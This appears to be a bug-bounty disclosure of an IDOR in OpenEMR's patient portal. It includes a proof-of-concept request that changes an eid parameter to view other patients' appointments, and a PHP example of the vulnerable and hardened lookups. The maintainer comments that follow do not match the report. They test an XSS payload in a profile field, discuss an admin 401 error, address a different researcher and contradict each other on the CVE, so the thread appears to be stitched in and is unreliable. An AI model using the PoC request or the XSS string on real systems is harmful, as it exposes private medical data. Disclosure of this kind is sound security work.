IDOR discloses other users' appointments in openemr/openemr

Status: Valid

Reported on Jul 25th 2022


Description:

In this case an IDOR allows an attacker to view portal users' appointments.

Proof of Concept

1. Go to http://demo.openemr.io/openemr/portal/home.php and then go to My Profile > My Appointment.
2. Click on the edit appointment button and capture the request in Burp Suite.
3. Change the eid parameter to any number.

PoC:

```http
GET https://demo.openemr.io/openemr/portal/add_edit_event_user.php?eid=24 <-- Change this to 23,22,25
Host: demo.openemr.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openemr.io/openemr/portal/home.php
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: keep-alive
Cookie: PortalOpenEMR=Sessionid
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
```

# Impact

An attacker can view all appointments.

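As an added illustration (not OpenEMR's own code and not the fix commit referenced in this thread), the following shows the eid-only lookup pattern behind this IDOR next to a lookup scoped to the logged-in portal patient. The table and column names (pc_eid, pc_pid), the session key `pid`, and the availability of pdo_sqlite are assumptions made for the example.

```php
<?php
// Added example, not OpenEMR's code: the eid-only lookup behind the IDOR next
// to a lookup scoped to the logged-in portal patient. The table and column
// names (pc_eid, pc_pid) and the session key 'pid' are modelled on OpenEMR's
// schema but are assumptions here; pdo_sqlite is assumed to be available.
declare(strict_types=1);

// Constructed sample data standing in for the appointment table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE openemr_postcalendar_events (pc_eid INTEGER PRIMARY KEY, pc_pid INTEGER, pc_title TEXT)');
$db->exec("INSERT INTO openemr_postcalendar_events VALUES (22, 7, 'Patient 7 follow-up'), (23, 9, 'Patient 9 consult'), (24, 7, 'Patient 7 lab review')");

// Vulnerable pattern: only eid is checked, so any authenticated portal user
// who edits the eid parameter is served another patient's appointment.
function loadEventVulnerable(PDO $db, int $eid): ?array
{
    $st = $db->prepare('SELECT pc_eid, pc_pid, pc_title FROM openemr_postcalendar_events WHERE pc_eid = ?');
    $st->execute([$eid]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened pattern: the row must also belong to the patient bound to the
// portal session, so a foreign eid yields no row and the caller denies access
// instead of leaking the record.
function loadEventForPatient(PDO $db, int $eid, int $sessionPid): ?array
{
    $st = $db->prepare('SELECT pc_eid, pc_pid, pc_title FROM openemr_postcalendar_events WHERE pc_eid = ? AND pc_pid = ?');
    $st->execute([$eid, $sessionPid]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$sessionPid = 7; // stands in for $_SESSION['pid'] of the logged-in portal patient
foreach ([24, 23] as $eid) { // 24 belongs to this patient, 23 to another patient
    $v = loadEventVulnerable($db, $eid);
    $h = loadEventForPatient($db, $eid, $sessionPid);
    printf("eid=%d vulnerable=%s hardened=%s\n", $eid, $v['pc_title'] ?? 'none', $h['pc_title'] ?? 'denied (403)');
}
```

In a real handler the `eid` value would come from `(int) $_GET['eid']` and the patient id from the portal session, never from the request.
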
We are processing your report and will contact the openemr team within 24 hours. a year ago
We have contacted a member of the openemr team and are waiting to hear back a year ago
We have sent a follow up to the openemr team. We will try again in 7 days. a year ago
Brady Miller (Maintainer), a year ago:

Hi @Distorted_Hacker, I was unable to confirm this. I used the same portal demo link in step 1 above and entered `Phil"><img src=x onerror=prompt(2)>` into the First name field (in My Profile) in step 2. Step 3 is a bit confusing since you can't go to a direct link like that (I ended up needing to log into openemr at https://demo.openemr.io/openemr for step 3; also unclear if you meant to have a discrepancy between http in step 1 and https in step 3).

Brady Miller (Maintainer), a year ago:

Used the wrong name on the above message; meant for this to go to @gaurav-g2.

Distorted_Hacker (Researcher), a year ago:

Hi @bradymiller, after the 2nd step we have to log in as admin in the 3rd step and then visit the portal audits section; here the admin will receive a 401 error and cannot access the portal audit section.

Distorted_Hacker (Researcher), a year ago:

Sorry, I mean in the 3rd step we have to log in as admin, and in the 1st and 2nd steps log in as patient.

stephen waite (Maintainer), a year ago:

Unable to reproduce this morning @gaurav-g2 at https://demo.openemr.io/openemr/interface/login/login.php?site=default, can you try again please? Thank you.

stephen waite (Maintainer), a year ago:

This happens when you are logged into the OpenEMR portal and the OpenEMR app in the same browser session; once you log out of the portal the access is restored.

We have sent a second follow up to the openemr team. We will try again in 10 days. a year ago
Distorted_Hacker modified the report a year ago
Distorted_Hacker (Researcher), a year ago:

Hi @bradymiller, check out the new update.

We have sent a third and final follow up to the openemr team. This report is now considered stale. a year ago
stephen waite validated this vulnerability a year ago

Thanks for the report. A preliminary fix has been posted in commit 86c1c443e0643eed82e2a66da4573fb71f73cbcd.

Please do not create a CVE # or make this vulnerability public at this time. We will make this fix official about 1 week after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 1-3 weeks. After we do that, it will be OK to make a CVE # and make it public.

Thanks!

Distorted_Hacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the openemr team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the openemr team. We will try again in 10 days. a year ago
We have sent a third and final fix follow up to the openemr team. This report is now considered stale. a year ago
Brady Miller marked this as fixed in 7.0.0.2 with commit 235b19 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Brady Miller published this vulnerability a year ago
Brady Miller (Maintainer), a year ago:

@admin, please assign a CVE. Thanks!
